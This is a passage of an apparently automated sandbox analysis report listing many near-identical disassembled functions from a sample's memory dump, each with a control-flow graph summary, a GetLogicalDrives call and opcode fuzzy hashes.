                                                            control_flow_graph 231 6db09e3-6db0d59 call 6db0bef 271 6db0d5f-6db0d79 GetLogicalDrives 231->271 272 6db0d84-6db0dd0 call 6db0ddc 271->272 276 6db0dd5-6db0de5 call 6db0deb 272->276 279 6db0de7-6db0de9 276->279 280 6db0dc6-6db0dcf 276->280 280->276 281 6db0dd0 call 6db0ddc 280->281 281->276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 46dd996773a82291ffaeb760ec2af768e886af43e9fdccd265c5e3a08649a3aa
                                                            • Instruction ID: eae45efabf493eed96520b2550a17960a2dcfc72d9307129d46e446b23ad8243
                                                            • Opcode Fuzzy Hash: 46dd996773a82291ffaeb760ec2af768e886af43e9fdccd265c5e3a08649a3aa
                                                            • Instruction Fuzzy Hash: 3951A0EB14C111FD738291852B14EFB6B7EE5D2730730A83AF487C664AE6D48A4A51B1
                                                            Function 06DB0A13 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 282 6db0a13-6db0d59 call 6db0bef 321 6db0d5f-6db0d79 GetLogicalDrives 282->321 322 6db0d84-6db0dd0 call 6db0ddc 321->322 326 6db0dd5-6db0de5 call 6db0deb 322->326 329 6db0de7-6db0de9 326->329 330 6db0dc6-6db0dcf 326->330 330->326 331 6db0dd0 call 6db0ddc 330->331 331->326
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 4805b20c3b218e1f31e47d7ba7cdee062f9539f6e037218de08a6f8c2e69d9b5
                                                            • Instruction ID: 52e7238df6c70b5d8072395039c25b9de21090f868f31872a9e35644af6df6ba
                                                            • Opcode Fuzzy Hash: 4805b20c3b218e1f31e47d7ba7cdee062f9539f6e037218de08a6f8c2e69d9b5
                                                            • Instruction Fuzzy Hash: C351D3EB14C111FD738291852F14EFB6B7EE5C3730730A83AF483C6A4AE6D48A4A11B1
                                                            Function 06DB0A24 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 290COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 332 6db0a24-6db0d59 call 6db0bef 368 6db0d5f-6db0d79 GetLogicalDrives 332->368 369 6db0d84-6db0dd0 call 6db0ddc 368->369 373 6db0dd5-6db0de5 call 6db0deb 369->373 376 6db0de7-6db0de9 373->376 377 6db0dc6-6db0dcf 373->377 377->373 378 6db0dd0 call 6db0ddc 377->378 378->373
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 3f7c75d9b8cd6528c088cc269721c7a690ea6b0af149c958460726faa71405fb
                                                            • Instruction ID: 2b5d8b221dab89d6d731ad6ca733ec6b53ae54d23ee62a0440215c8d15be9cf6
                                                            • Opcode Fuzzy Hash: 3f7c75d9b8cd6528c088cc269721c7a690ea6b0af149c958460726faa71405fb
                                                            • Instruction Fuzzy Hash: 8F51D4EB14C211FD738291952F14EFB6B7EE5D3730730A43AF487C664AE6D48A4911B1
                                                            Function 06DB0A3E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 289COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 379 6db0a3e-6db0a40 380 6db0a6d-6db0d59 call 6db0bef 379->380 381 6db0a42-6db0a6c 379->381 415 6db0d5f-6db0d79 GetLogicalDrives 380->415 381->380 416 6db0d84-6db0dd0 call 6db0ddc 415->416 420 6db0dd5-6db0de5 call 6db0deb 416->420 423 6db0de7-6db0de9 420->423 424 6db0dc6-6db0dcf 420->424 424->420 425 6db0dd0 call 6db0ddc 424->425 425->420
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            • Opcode ID: 762852a67367e12250a3f31c936c9b4b4663691b3bf0d6b3dedfae4de681e1f8
                                                            • Instruction ID: 10d092a5f08cbd5ac6ad36f4821a49986b9b05955f3188c012f5a436303d4a50
                                                            • Opcode Fuzzy Hash: 762852a67367e12250a3f31c936c9b4b4663691b3bf0d6b3dedfae4de681e1f8
                                                            • Instruction Fuzzy Hash: B55106EB14C211FD738291952F14EFB6B7EE5C3730730A43AF483C6A4AE6D48A4A11B1
                                                            Function 06DB0A5B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 281COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 426 6db0a5b-6db0d59 call 6db0bef 460 6db0d5f-6db0d79 GetLogicalDrives 426->460 461 6db0d84-6db0dd0 call 6db0ddc 460->461 465 6db0dd5-6db0de5 call 6db0deb 461->465 468 6db0de7-6db0de9 465->468 469 6db0dc6-6db0dcf 465->469 469->465 470 6db0dd0 call 6db0ddc 469->470 470->465
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 9d5dd60d9802dfef50bc12168cb12c0264e55bcb738053b6c7c09c767a260cbd
                                                            • Instruction ID: 76a1ec40d86a9284feb1509c779766a8f4b932fc959615074c23b126e8489438
                                                            • Opcode Fuzzy Hash: 9d5dd60d9802dfef50bc12168cb12c0264e55bcb738053b6c7c09c767a260cbd
                                                            • Instruction Fuzzy Hash: A151F5EB14C121FD738291852F54AFB6B7EE5C3730730A43AF443C664AE7D48A4911B1
                                                            Function 06DB0A84 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 263COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 471 6db0a84-6db0d59 call 6db0bef 504 6db0d5f-6db0d79 GetLogicalDrives 471->504 505 6db0d84-6db0dd0 call 6db0ddc 504->505 509 6db0dd5-6db0de5 call 6db0deb 505->509 512 6db0de7-6db0de9 509->512 513 6db0dc6-6db0dcf 509->513 513->509 514 6db0dd0 call 6db0ddc 513->514 514->509
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: a7b1f56b1fd988e26803f4a458a104585d9669e9febbc44f6a19db5ba35b6653
                                                            • Instruction ID: 85da672b0e7acaadfec16088901e9c3c39a3fb2b53cada42c49598a75f56f987
                                                            • Opcode Fuzzy Hash: a7b1f56b1fd988e26803f4a458a104585d9669e9febbc44f6a19db5ba35b6653
                                                            • Instruction Fuzzy Hash: 4751D4EB54C111FD738291852F10EFB6B7EE5D3730730A43AF483C6A4AE6D48A4A11B1
                                                            Function 06DB0A9D Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 261COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 515 6db0a9d-6db0d59 call 6db0bef 545 6db0d5f-6db0d79 GetLogicalDrives 515->545 546 6db0d84-6db0dd0 call 6db0ddc 545->546 550 6db0dd5-6db0de5 call 6db0deb 546->550 553 6db0de7-6db0de9 550->553 554 6db0dc6-6db0dcf 550->554 554->550 555 6db0dd0 call 6db0ddc 554->555 555->550
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: d0cf8ba96680950983a01b40056ccc5efb832a8c4111df5acebb9bbe7c394870
                                                            • Instruction ID: 2207a0ddc03ad4e098643a32c923e79cf21b388d7783d456c3fa92558d812a3d
                                                            • Opcode Fuzzy Hash: d0cf8ba96680950983a01b40056ccc5efb832a8c4111df5acebb9bbe7c394870
                                                            • Instruction Fuzzy Hash: DC51F3EB54C211FD738281952F10AFB6B7EE5D3730730A43AF483C664AE6E48E4A11B1
                                                            Function 06DB0AFD Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 259COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 598 6db0afd-6db0b0f 599 6db0aae-6db0af7 598->599 600 6db0b10-6db0d59 call 6db0bef 598->600 599->600 629 6db0d5f-6db0d79 GetLogicalDrives 600->629 630 6db0d84-6db0dd0 call 6db0ddc 629->630 634 6db0dd5-6db0de5 call 6db0deb 630->634 637 6db0de7-6db0de9 634->637 638 6db0dc6-6db0dcf 634->638 638->634 639 6db0dd0 call 6db0ddc 638->639 639->634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            • Opcode ID: 16c6a6b90e0f2b801d835b9a6ca8038860e90e00c853e0f5a0375641605d3f05
                                                            • Instruction ID: d3f10b37f5dfadaa7ca5c8cc6f51919de7fbdcbf8d01e2e436c0b7a086b47878
                                                            • Opcode Fuzzy Hash: 16c6a6b90e0f2b801d835b9a6ca8038860e90e00c853e0f5a0375641605d3f05
                                                            • Instruction Fuzzy Hash: 7B51E3EB54C211FD738291956F10AFB6B7EE5D3730730A83AF483C664AE7D48A4A11B1
                                                            Function 06DB0A90 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 259COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 556 6db0a90-6db0d59 call 6db0bef 587 6db0d5f-6db0d79 GetLogicalDrives 556->587 588 6db0d84-6db0dd0 call 6db0ddc 587->588 592 6db0dd5-6db0de5 call 6db0deb 588->592 595 6db0de7-6db0de9 592->595 596 6db0dc6-6db0dcf 592->596 596->592 597 6db0dd0 call 6db0ddc 596->597 597->592
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 8fb3cd99a8eae657b5545cfe614e3edaf27df67dad81d0dc8a07bee1b0dca038
                                                            • Instruction ID: 2f29675d5c71ce84cae04a33298e8214bd1e66e360ef1ad907124427a36db8c8
                                                            • Opcode Fuzzy Hash: 8fb3cd99a8eae657b5545cfe614e3edaf27df67dad81d0dc8a07bee1b0dca038
                                                            • Instruction Fuzzy Hash: C751D3EB54C211FD738291852F10EFB6B7EE5D3730730A43AF483C664AE6D48A4A11B1
                                                            Function 06DB0B20 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 253COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 640 6db0b20-6db0b29 641 6db0b2b-6db0b2d 640->641 642 6db0ac4-6db0b1b 640->642 644 6db0b2f-6db0d59 call 6db0bef 641->644 642->644 670 6db0d5f-6db0d79 GetLogicalDrives 644->670 671 6db0d84-6db0dd0 call 6db0ddc 670->671 675 6db0dd5-6db0de5 call 6db0deb 671->675 678 6db0de7-6db0de9 675->678 679 6db0dc6-6db0dcf 675->679 679->675 680 6db0dd0 call 6db0ddc 679->680 680->675
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            • Opcode ID: 03d98192e4a4ae95b62e521f3e4244b18b8635de064fe2bde60a61545019290c
                                                            • Instruction ID: 85c3c0200784b1ddd80b2b2ae0d144554280a4e028ccba83777e77cb6c7bf554
                                                            • Opcode Fuzzy Hash: 03d98192e4a4ae95b62e521f3e4244b18b8635de064fe2bde60a61545019290c
                                                            • Instruction Fuzzy Hash: 6D4119EB54C211FD738291952B10AFB6B7EE5D3730730A43AF483C7A4AE7D48A4A51B1
                                                            Function 06DB0AB8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 250COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 681 6db0ab8-6db0d59 call 6db0bef 710 6db0d5f-6db0d79 GetLogicalDrives 681->710 711 6db0d84-6db0dd0 call 6db0ddc 710->711 715 6db0dd5-6db0de5 call 6db0deb 711->715 718 6db0de7-6db0de9 715->718 719 6db0dc6-6db0dcf 715->719 719->715 720 6db0dd0 call 6db0ddc 719->720 720->715
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 9d272abe62ab10ab09e169776ee109c6360f938de722ba931bd2eb81c6942ca3
                                                            • Instruction ID: aea36aa2f7a48fb000384cb464d3fa4d3d34cd3aadc942a63c2de172bc26f722
                                                            • Opcode Fuzzy Hash: 9d272abe62ab10ab09e169776ee109c6360f938de722ba931bd2eb81c6942ca3
                                                            • Instruction Fuzzy Hash: 4C41F4EB54C211FD738291956B10AFB6B7EE5D3730730A43AF443C764AE6D48A4A11B1
                                                            Function 06DB0AD1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 239COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 721 6db0ad1-6db0d59 call 6db0bef 748 6db0d5f-6db0d79 GetLogicalDrives 721->748 749 6db0d84-6db0dd0 call 6db0ddc 748->749 753 6db0dd5-6db0de5 call 6db0deb 749->753 756 6db0de7-6db0de9 753->756 757 6db0dc6-6db0dcf 753->757 757->753 758 6db0dd0 call 6db0ddc 757->758 758->753
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 7b877a1c93f53c08dd660b30ccb93c37f9030a46d90f6a1ffd1a1c0226308d69
                                                            • Instruction ID: a137f2c6a7e0483b33587162f8893cd08f75bdcdf52122af804ea88cbdf07d70
                                                            • Opcode Fuzzy Hash: 7b877a1c93f53c08dd660b30ccb93c37f9030a46d90f6a1ffd1a1c0226308d69
                                                            • Instruction Fuzzy Hash: AE41F3EB54C211FD738291952B50AFB6B7EE5D3730730A43AF483C7A4AE6D48E4911B1
                                                            Function 06DB0AED Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 229COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: fa66c6ae1788b8d991cad46407eba8e4f158ee094839c09f6cd9060da184d330
                                                            • Instruction ID: bca682508e8b1aed8944519f4773d84de54891b8b619e06ee940a59b42ed1eb5
                                                            • Opcode Fuzzy Hash: fa66c6ae1788b8d991cad46407eba8e4f158ee094839c09f6cd9060da184d330
                                                            • Instruction Fuzzy Hash: B64123EB14C211FD738291952F10AFB6B7EE5D3730730A43AF483C664AE7E48A4A11B1
                                                            Function 06DB0B37 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 3cc4d28599320560f5172dad1e7c7db25a5d6ecfd47440bb9eeae6bc2023ecd5
                                                            • Instruction ID: 66db2a817fb8d951b44db710831c8f40cefe16e0e3f7956aa7ef0f1508ec89cf
                                                            • Opcode Fuzzy Hash: 3cc4d28599320560f5172dad1e7c7db25a5d6ecfd47440bb9eeae6bc2023ecd5
                                                            • Instruction Fuzzy Hash: 4B4138EB54C211FD738291952B50AFBAB7EE5D3730730A43AF443C264AE7E48A4911B1
                                                            Function 06DB0B5F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 262641bf5fcb44121279acbaa4d79ead475699e38ae2a53b516dcaeda7f7eac5
                                                            • Instruction ID: 4c7ed66b41346cc32b4ece68e890243810e388216f57bf3c43f793b513f0e5bb
                                                            • Opcode Fuzzy Hash: 262641bf5fcb44121279acbaa4d79ead475699e38ae2a53b516dcaeda7f7eac5
                                                            • Instruction Fuzzy Hash: 104137EB54C111FD738290952B50AFB6B7EE5D3730330A43AF443C764AE7E48A0A11B1
                                                            Function 06DB0B93 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            • Opcode ID: 6da9be80e7f4335054ec4d94df77007bee0c7770e43b9499afa130b8783cb8d1
                                                            • Instruction ID: f46610734e1e72db0b3326715cd6643a6a42279c165a8fd32b5612cb8ad56f1f
                                                            • Opcode Fuzzy Hash: 6da9be80e7f4335054ec4d94df77007bee0c7770e43b9499afa130b8783cb8d1
                                                            • Instruction Fuzzy Hash: A7315BEB54C211FE738291956B10AFB6B7EE5D3330730A43AF443D3A4AE7E49A0911B1
                                                            Function 06DB0BBD Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 2bd4414a9cde193e8859200d75e344476c25ce18cb634b1ece83194c5b83911c
                                                            • Instruction ID: 0c66a51789c645e93a42454003ab3ddb3fabb4c24969d3a9781e75c71459d944
                                                            • Opcode Fuzzy Hash: 2bd4414a9cde193e8859200d75e344476c25ce18cb634b1ece83194c5b83911c
                                                            • Instruction Fuzzy Hash: 11317BEB40C211FEB38281956F146FBAB7EE5C3330334A43AF483C264AE7D45A0951B1
                                                            Function 06DB0C10 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: d41eb2f2f2fb1639a3ebd2107ce3194a2305b7cbfe90abca94cc02d7600e54b1
                                                            • Instruction ID: f5c8dcdd69a4926745cbf85fe688a6b74795c40cad6b6a36b570ca206bb7339a
                                                            • Opcode Fuzzy Hash: d41eb2f2f2fb1639a3ebd2107ce3194a2305b7cbfe90abca94cc02d7600e54b1
                                                            • Instruction Fuzzy Hash: E531A0EB50C211FEB38381A12A546FB6B7DE4C3630330A47AF043C694AE7C48A0D5171
                                                            Function 06DB0C45 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 549b7becb538c5dcb61da369dc623722274010be19a1976d99d7b19a562abe7f
                                                            • Instruction ID: 7672af2068bf8d116a1f2af45fcfe8f47a6eb78d30d6b859513c56873d7f171f
                                                            • Opcode Fuzzy Hash: 549b7becb538c5dcb61da369dc623722274010be19a1976d99d7b19a562abe7f
                                                            • Instruction Fuzzy Hash: D63107EF54C111FDB38291952B14AFB6B7DE5C3730770A436F483C2A49E3D49A4911B1
                                                            Function 06DB0BEF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 937ff00ad9dae345b7516d3a1d62579ecf776d4eff7f18fe5c4b08939af0754a
                                                            • Instruction ID: ea221e038d93720b6f30b18bee9fb3176db470a31340ee934bf5222d80aafc5a
                                                            • Opcode Fuzzy Hash: 937ff00ad9dae345b7516d3a1d62579ecf776d4eff7f18fe5c4b08939af0754a
                                                            • Instruction Fuzzy Hash: 8B2106EB54C211FD738291952B14AFB6B7EE5C3730330A43AF443C2949E7D48A0D61B1
                                                            Function 06DB0BF9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: d7e9b457868e16b634ffc8be1d4207dcf8a5573e0c41f6c146b5fdd50f506f02
                                                            • Instruction ID: 92dfcda8879e133eada3e362cbd9456f94d3a938a265604641d830d7031c8e0e
                                                            • Opcode Fuzzy Hash: d7e9b457868e16b634ffc8be1d4207dcf8a5573e0c41f6c146b5fdd50f506f02
                                                            • Instruction Fuzzy Hash: 452128EB44C211FD738291952B54AFBAB7EE5C3730330A43AF443C6A4AE3D48A0951B1
                                                            Function 06DB0C29 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 1fd03ad71e041a40bfc1e8222ea43543c4342a32a00a792dd5b9519293838540
                                                            • Instruction ID: a9bb24715f1e8720483273740fa74d22af5cc21e7a075f22b343b17e78bac5f2
                                                            • Opcode Fuzzy Hash: 1fd03ad71e041a40bfc1e8222ea43543c4342a32a00a792dd5b9519293838540
                                                            • Instruction Fuzzy Hash: 492124EB448111FD738291952B14AFBAB7EE4C3730330A43AF443C6A4AE3D48A0D21B1
                                                            Function 06DB0C78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: eeb4f6e2fa6f91260afaf23b47d67d96bb8f6bc5ef1a28af244a5ec998d69ae6
                                                            • Instruction ID: b7bf9e99cd1c89389b1a936c33b36127a27ab5e29a85a516d52b84abc23f3959
                                                            • Opcode Fuzzy Hash: eeb4f6e2fa6f91260afaf23b47d67d96bb8f6bc5ef1a28af244a5ec998d69ae6
                                                            • Instruction Fuzzy Hash: 4421F1EB548121FD738295A53B14AFBAA7DE4C2630330A43AF483D294AE7D49A0961B1
                                                            Function 06DB0C88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
